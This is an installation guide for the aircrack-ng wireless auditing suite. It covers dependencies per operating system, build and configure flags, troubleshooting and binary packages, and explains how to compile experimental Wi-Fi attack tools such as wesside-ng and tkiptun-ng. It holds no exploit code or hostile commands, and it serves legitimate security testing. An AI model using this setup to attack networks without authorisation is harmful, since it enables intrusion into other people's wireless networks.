 Kernel headers and gcc as well as make have to be installed on your system (build-essential on
Debian based distributions)
 make and Standard C++ Library development package (Debian: libstdc++-dev)
Windows (Cygwin)
 w32api is required
 if using clang, libiconv and libiconv-devel
 make and Standard C++ Library development package
MacOS
Install the following via Homebrew (brew):

 autoconf
 automake
 libtool
 openssl
 shtool
 pkg-config
 hwloc
 pcre
 sqlite3
 libpcap
 cmocka (optional)
FreeBSD, OpenBSD, NetBSD, Solaris
Install the following via pkg:

 gmake
 pkgconf
 pcre
 sqlite3
 gcc9 (or better)
Optional stuff
 If you want SSID filtering with regular expression in airodump-ng (-essid-regex) pcre
development package is required.
 If you want to use airolib-ng and '-r' option in aircrack-ng, SQLite development package >=
3.3.17 (3.6.X version or better is recommended)
 If you want to use Airpcap, the 'developer' directory from the CD is required. It can be
downloaded here.
 For best performance on FreeBSD (50-70% more), install gcc5 via: pkg install gcc5 Then
compile with: gmake CC=gcc5 CXX=g++5
 rfkill
 CMocka
 hwloc: strongly recommended, especially on high core count systems where it may give a
serious performance boost
Compiling and installing
Notes:

 On OS X, *BSD and Solaris, use 'gmake' instead of 'make'.

 In order to compile with clang instead of gcc, add 'CC=clang CXX=clang++' to the configure
command.
Current version

wget https://download.aircrack-ng.org/aircrack-ng-1.7.tar.gz

tar -zxvf aircrack-ng-1.7.tar.gz

cd aircrack-ng-1.7

autoreconf -i

./configure --with-experimental

make

make install

ldconfig
Compiling with AirPcap support (cygwin only)
1. Copy 'developer' directory from the AirPcap CD at the same level as 'Aircrack-ng' directory
2. Append '- -with-airpcap=../developer' parameter to configure:
Compiling on *BSD
Commands are exactly the same as Linux but instead of make, use gmake (with CC=gcc5 CXX=g+
+5 or any more recent gcc version installed).

Compiling on MacOS
Commands are exactly the same as Linux

Latest Git (development) Sources

Note: Compilation parameters can also be used with the sources from our git repository.

git clone https://github.com/aircrack-ng/aircrack-ng

cd aircrack-ng

autoreconf -i

./configure --with-experimental

make

make install

ldconfig

./configure flags
When configuring, the following flags can be used and combined to adjust the suite to your
choosing:

 with-airpcap=DIR: needed for supporting airpcap devices on windows (cygwin or msys2 only)
Replace DIR above with the absolute location to the root of the extracted source code from the
Airpcap CD or downloaded SDK available online. Required on Windows to build besside-ng,
besside-ng-crawler, easside-ng, tkiptun-ng and wesside-ng when building experimental tools.
The developer pack (Compatible with version 4.1.1 and 4.1.3) can be downloaded
at https://support.riverbed.com/content/support/software/steelcentral-npm/airpcap.html
 with-experimental: needed to compile tkiptun-ng, easside-ng, buddy-ng, buddy-ng-crawler,
airventriloquist and wesside-ng. libpcap development package is also required to compile most
of the tools. If not present, not all experimental tools will be built. On Cygwin, libpcap is not
 present and the Airpcap SDK replaces it. See –with-airpcap option above. On debian based
distro, install libpcap-dev
 with-ext-scripts: needed to build airoscript-ng, versuck-ng, airgraph-ng and airdrop-ng. Note:
Each script has its own dependencies. Note: It's only required in install phase.
 with-gcrypt: Use libgcrypt crypto library instead of the default OpenSSL. And also use internal
fast sha1 implementation (borrowed from GIT) Dependency (Debian): libgcrypt20-dev
 with-duma: Compile with DUMA support. DUMA is a library to detect buffer overruns and under-
runs. Dependencies (debian): duma
 with-xcode: Set this flag to true to compile on OS X with Xcode 7+.
 disable-libnl: Set-up the project to be compiled without libnl (1 or 3). Linux option only.
 without-opt: Do not enable stack protector (on GCC 4.9 and above).
 enable-shared: Make OSdep a shared library.
 disable-shared: When combined with enable-static, it will statically compile Aircrack-ng.
 with-avx512: On x86, add support for AVX512 instructions in aircrack-ng. Only use it when the
current CPU supports AVX512.
 with-static-simd=: Compile a single optimization in aircrack-ng binary. Useful when compiling
statically and/or for space-constrained devices. Valid SIMD options: x86-sse2, x86-avx, x86-
avx2, x86-avx512, ppc-altivec, ppc-power8, arm-neon, arm-asimd. Must be used with –enable-
static –disable-shared. When using those 2 options, the default is to compile the generic
optimization in the binary. –with-static-simd merely allows to choose another one.
 enable-maintainer-mode: It is important to enable this flag when developing with Aircrack-ng.
This flag enables additional compile warnings and safety features.
Troubleshooting Tips
error while loading shared libraries: libaircrack-ng.so.0
Run ldconfig as root or with “sudo” to solve the issue.

"command not found" error message

After you do “make install” then try to use any of the Aircrack-ng suite commands, you get the error
message “command not found” or similar. Your system will look for the Aircrack-ng commands in the
directories defined by the PATH command.

Normally, the Aircrack-ng suite programs and man pages are placed in:

/usr/local/bin

/usr/local/sbin

/usr/local/man

On your system, to determine which directories have the Aircrack-ng programs enter the following. If
using “locate” be sure to first run “updatedb”.

locate aircrack-ng
 locate airmon-ng

or

find / -name aircrack-ng

find / -name airmon-ng

Once you know the directories (exclude the source directories) then determine which directories are
in your PATH. To see which directories are included in PATH on your particular system enter:

echo $PATH

It should show something like:

/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

At this point compare the actual locations with the directories in your PATH. If the directories are
missing from your PATH then you have a few options:

 Add the directories to your PATH. See the one or more of the following web sites for details of
how to do this:
https://www.cyberciti.biz/faq/howto-print-path-variable/

http://www.troubleshooters.com/linux/prepostpath.htm

 Change to the particular directory with “cd” and then run the commands from within the directory.
Don't forget to add “./” in front of each command.
 Specify the full path for each command. So if Aircrack-ng is located in the “/usr/local/bin”
directory then run the command as “/usr/local/bin/aircrack-ng”.
Installing pre-compiled binaries
Linux/BSD/OSX
With the exception of Linux penetration testing distributions, packages are usually out of date
(MacOS is the exception). In this case, uninstalling the package and installing from sources is the
recommended way to go.

We offer packages (statically compiled binaries) for any distribution that supports .deb or .rpm
packages thanks to PackageCloud.io so you can use your distro's package manager to install and
keep Aircrack-ng up to date:
 Debian
 Ubuntu
 Mint
 SLES
 OpenSuse
 Fedora
 RHEL
 CentOS
 Amazon Linux
 Elementary OS
While most folks want to use our “release” packages, “git” packages are available too for those who
decide to use bleeding edge.

More details about them can be found in our blog post.

On MacOS, install it is via Macports or brew. Simply do “brew install aircrack-ng” or “sudo ports
install aircrack-ng”

Windows
The Windows version of the Aircrack-ng suite does not have an install program. You must manually
install (unzipping archive) the software.

Here are the steps to follow for Windows:

 Download the latest version of the Aircrack-ng suite for Windows to your computer. The link for
the zip file can be found on the Wiki home page.
 Unzip the contents of the Aircrack-ng zip file into “C:\”. This will create a directory called
“aircrack-ng-1.6-win”. This directory name will vary based on the exact version that you
downloaded. This main directory contains three subdirectories - “bin”, “src” and “test”.
Prior to using the software, make sure to install the drivers for your particular wireless card. See
this link for the instructions. We currently only support Airpcap; other adapters may be supported but
require development of your own DLL so the different tools can interact with it.

To now use the Aircrack-ng suite, start Windows Explorer and double click on Aircrack-
ng GUI.exe inside “bin” subdirectory. The GUI requires .NET version 4.6.1 to run.

Alternatively, open a command prompt (Start menu → Execute → cmd.exe) and change to the “C:\
aircrack-ng-1.6-win\bin” directory and execute the individual commands.

Important notes:

 Airmon-ng is a Linux/FreeBSD tool only.

 Remember that Windows only supports a limited subset of the commands.
 Some troubleshooting tips specific to XP and Vista can be found on this page.